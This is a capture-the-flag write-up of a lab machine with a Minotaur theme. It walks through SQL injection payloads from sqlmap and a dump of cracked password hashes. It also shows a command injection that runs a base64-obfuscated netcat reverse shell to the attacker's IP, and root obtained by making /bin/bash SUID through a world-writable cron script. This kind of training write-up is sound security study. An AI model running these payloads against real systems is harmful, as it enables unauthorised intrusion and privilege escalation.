# Summary
**We scan the box and find 4 ports open. FTP allows anonymous login but not much was found. Hard-coded credentials were found in the Javascript script that handled the login page allowing us to login as a user. The search panel in index.php was vulnerable to SQL injection which allowed the threat actor to dump user credentials including admin credentials. The admin credentials lead to a secret panel which allowed command injections which lead to Remote Code Execution.
The machine was totally compromised due to a script being run as a cronjob as root being editable by everyone.
# Enumeration
## NMAP
```txt
PORT     STATE SERVICE  REASON  VERSION
21/tcp   open  ftp      syn-ack ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x   3 nobody   nogroup      4096 Jun 15 14:57 pub
80/tcp   open  http     syn-ack Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/8.0.7 mod_perl/2.0.11 Perl/v5.32.1)
| http-title: Login
|_Requested resource was login.html
|_http-server-header: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/8.0.7 mod_perl/2.0.11 Perl/v5.32.1
|_http-favicon: Unknown favicon MD5: C4AF3528B196E5954B638C13DDC75F2F
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
443/tcp  open  ssl/http syn-ack Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/8.0.7 mod_perl/2.0.11 Perl/v5.32.1)
|_http-server-header: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/8.0.7 mod_perl/2.0.11 Perl/v5.32.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE/localityName=Berlin
| Issuer: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE/localityName=Berlin
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2004-10-01T09:10:30
| Not valid after:  2010-09-30T09:10:30
| MD5:   b181 18f6 1a4d cb51 df5e 189c 40dd 3280
| SHA-1: c4c9 a1dc 528d 41ac 1988 f65d b62f 9ca9 22fb e711
| -----BEGIN CERTIFICATE-----
| MIIC5jCCAk+gAwIBAgIBADANBgkqhkiG9w0BAQQFADBcMQswCQYDVQQGEwJERTEP
| MA0GA1UECBMGQmVybGluMQ8wDQYDVQQHEwZCZXJsaW4xFzAVBgNVBAoTDkFwYWNo
| ZSBGcmllbmRzMRIwEAYDVQQDEwlsb2NhbGhvc3QwHhcNMDQxMDAxMDkxMDMwWhcN
| MTAwOTMwMDkxMDMwWjBcMQswCQYDVQQGEwJERTEPMA0GA1UECBMGQmVybGluMQ8w
| DQYDVQQHEwZCZXJsaW4xFzAVBgNVBAoTDkFwYWNoZSBGcmllbmRzMRIwEAYDVQQD
| Ewlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMzLZFTC+qN6
| gTZfG9UQgXW3QgIxg7HVWnZyane+YmkWq+s5ZrUgOTPRtAF9I0AknmAcqDKD6p3x
| 8tnwGIWd4cDimf+JpPkVvV26PzkuJhRIgHXvtcCUbipi0kI0LEoVF1iwVZgRbpH9
| KA2AxSHCPvt4bzgxSnjygS2Fybgr8YbJAgMBAAGjgbcwgbQwHQYDVR0OBBYEFBP8
| X524EngQ0fE/DlKqi6VEk8dSMIGEBgNVHSMEfTB7gBQT/F+duBJ4ENHxPw5Sqoul
| RJPHUqFgpF4wXDELMAkGA1UEBhMCREUxDzANBgNVBAgTBkJlcmxpbjEPMA0GA1UE
| BxMGQmVybGluMRcwFQYDVQQKEw5BcGFjaGUgRnJpZW5kczESMBAGA1UEAxMJbG9j
| YWxob3N0ggEAMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEEBQADgYEAFaDLTAkk
| p8J2SJ84I7Fp6UVfnpnbkdE2SBLFRKccSYZpoX85J2Z7qmfaQ35p/ZJySLuOQGv/
| IHlXFTt9VWT8meCpubcFl/mI701KBGhAX0DwD5OmkiLk3yGOREhy4Q8ZI+Eg75k7
| WF65KAis5duvvVevPR1CwBk7H9CDe8czwrc=
|_-----END CERTIFICATE-----
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| tls-alpn: 
|_  http/1.1
|_http-title: Bad request!
|_http-favicon: Unknown favicon MD5: BE43D692E85622C2A4B2B588A8F8E2A6
3306/tcp open  mysql?   syn-ack
| fingerprint-strings: 
|   GetRequest, NULL: 
|_    Host 'ip-10-17-1-163.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
| mysql-info: 
|_  MySQL Error: Host 'ip-10-17-1-163.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.92%I=7%D=11/7%Time=61879FAC%P=x86_64-pc-linux-gnu%r(NU
SF:LL,68,"d\0\0\x01\xffj\x04Host\x20'ip-10-17-1-163\.eu-west-1\.compute\.i
SF:nternal'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Mari
SF:aDB\x20server")%r(GetRequest,68,"d\0\0\x01\xffj\x04Host\x20'ip-10-17-1-
SF:163\.eu-west-1\.compute\.internal'\x20is\x20not\x20allowed\x20to\x20con
SF:nect\x20to\x20this\x20MariaDB\x20server");

```

# FTP
- Anonymous login allowed
```bash
drwxr-xr-x   3 nobody   nogroup      4096 Jun 15 14:57 .
drwxr-xr-x   3 root     root         4096 Jun 15 14:45 ..
drwxr-xr-x   2 root     root         4096 Jun 15 19:49 .secret
-rw-r--r--   1 root     root          141 Jun 15 14:57 message.txt
```
```bash
-rw-r--r--   1 root     root           30 Jun 15 19:49 flag.txt
-rw-r--r--   1 root     root          114 Jun 15 14:56 keep_in_mind.txt
```
```txt
Not to forget, he forgets a lot of stuff, that's why he likes to keep things on a timer ... literally
-- Minotaur
```

# Web
- We have  a login page.
- It doesn't return username or password is wrong.
- The login is being handled by Javascript.
```txt
function pwdgen() {
    a = ["0", "h", "?", "1", "v", "4", "r", "l", "0", "g"]
    b = ["m", "w", "7", "j", "1", "e", "8", "l", "r", "a", "2"]
    c = ["c", "k", "h", "p", "q", "9", "w", "v", "5", "p", "4"]
}
//pwd gen for Daedalus a[9]+b[10]+b[5]+c[8]+c[8]+c[1]+a[1]+a[5]+c[0]+c[1]+c[8]+b[8]
//                             |\____/|
///                           (\|----|/)
//                             \ 0  0 /
//                              |    |
//                           ___/\../\____
//                          /     --       \

$(document).ready(function() {
    $("#forgot-password").click(function() {
        alert("Ye .... Thought it would be this easy? \n                       -_______-")
    });
    $("#submit").click(function() {
        console.log("TEST")

        var email = $("#email1").val();
        var password = $("#password1").val();

        if (email == '' || password == '') {
            alert("Please fill all fields.");
            return false;
        }

        $.ajax({
            type: "POST",
            url: "login.php",
            data: {
                email: email,
                password: password

            },
            cache: false,
            success: function(data) {
                //alert(data);
                window.location.href = "index.php"
            },
            error: function(xhr, status, error) {
                console.error(xhr);
            }
        });

    });

});
```
- We see that the password generator for Daedalus is just adding characters from the list from certain index.
- We finally get :
`'g2e55kh4ck5r'`
- Possible credentials
`daedalus:'g2e55kh4ck5r'`
- We can login and greeted with something we can search with. And we can choose tables. Maybe SQL injection?
- If we search for `'`, we get an alert `No callback`


### SQL Injection
- We can send the request to SQLMAP to see if it is vulnerable to injection.
```bash
Parameter: nameCreature (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: nameCreature=1' AND (SELECT 1860 FROM (SELECT(SLEEP(5)))IqHk) AND 'ElHl'='ElHl

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: nameCreature=1' UNION ALL SELECT CONCAT(0x716b6a7171,0x6f716c735743657862694d44697443676e4a6c43726167746e56787173566f48476a707061645966,0x71627a7171),NULL,NULL-- -
---
```
- Nothing interesting in `mysql` table.
- Found username and passwords in Database Labyrinth and table people.
```bash
+----------+--------------+----------------------------------+------------------+
| idPeople | namePeople   | passwordPeople                   | permissionPeople |
+----------+--------------+----------------------------------+------------------+
| 1        | Eurycliedes  | 42354020b68c7ed28dcdeabd5a2baf8e | user             |
| 2        | Menekrates   | 0b3bebe266a81fbfaa79db1604c4e67f | user             |
| 3        | Philostratos | b83f966a6f5a9cff9c6e1c52b0aa635b | user             |
| 4        | Daedalus     | b8e4c23686a3a12476ad7779e35f5eb6 | user             |
| 5        | M!n0taur     | 1765db9457f496a39859209ee81fbda4 | admin            |
+----------+--------------+----------------------------------+------------------+
```
- We're interested in admin password. So let's crack that.
- Hash is MD5
- Possible credential :
`M!n0taur:aminotauro`
- And if we re-login with the credential, we get new features and a flag!
- And now there is another panel called `Secret_stuff`
- It is a panel which we can enter something and it'll echo?
- If we echo for `test`, it'll echo back `test`

# Foothold
- Assuming that the command is being run is `echo $WORD`, we can probably try to inject some command injection.
- Let's try with `test | ping -c 2 10.17.1.163` which is our attack machine.
- Now let's listen for ICMP requests on our machine.
```bash
05:18:44.544366 IP 10.10.188.27 > 10.17.1.163: ICMP echo request, id 7084, seq 1, length 64
05:18:44.544402 IP 10.17.1.163 > 10.10.188.27: ICMP echo reply, id 7084, seq 1, length 64
```
- We get a ping back! We can confirm that the parameter is vulnerable to command injection and it seems like there's no filtering being done.
- Let's try a reverse shell
```bash

You really think this is gonna be possible i fixed this @Deadalus -_- !!!?
```
- Okay so there's some filtering of words.
- Filtered:
```
wget
```
- After trying for a while, the equal signs of base64 is also filtered but that's not really needed since it's used for padding only.
```bash
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDEwLjE3LjEuMTYzIDkwMDEgPi90bXAvZg | base64 -d | sh
```
- And we have a shell.

# Post-Exploit.
We're currently user `daemon`
- We find something unusual in the `/` directory.
```bsah
drwxrwxrwx   2 root root      4096 jún   15 18:01 timers
-rwxrwxrwx  1 root root   70 jún   15 18:01 timer.sh
```
-It's owned by root but we have write permissions?
# Privilege Escalation.
- Assuming that the script is being run at some time, we can edit it to make it malicious.
```bash
#!/bin/bash
echo "dont fo...forge...ttt" >> /reminders/dontforget.txt
chmod 4777 /bin/bash
```
- We'll set `/bin/bash` as a SUID binary.
- After a while we can observe the permissions of the binary.
```bash
-rwsrwxrwx 1 root root 1113504 jún    7  2019 /bin/bash
```
- We can now run `/bin/bash -p` to gain a root shell.

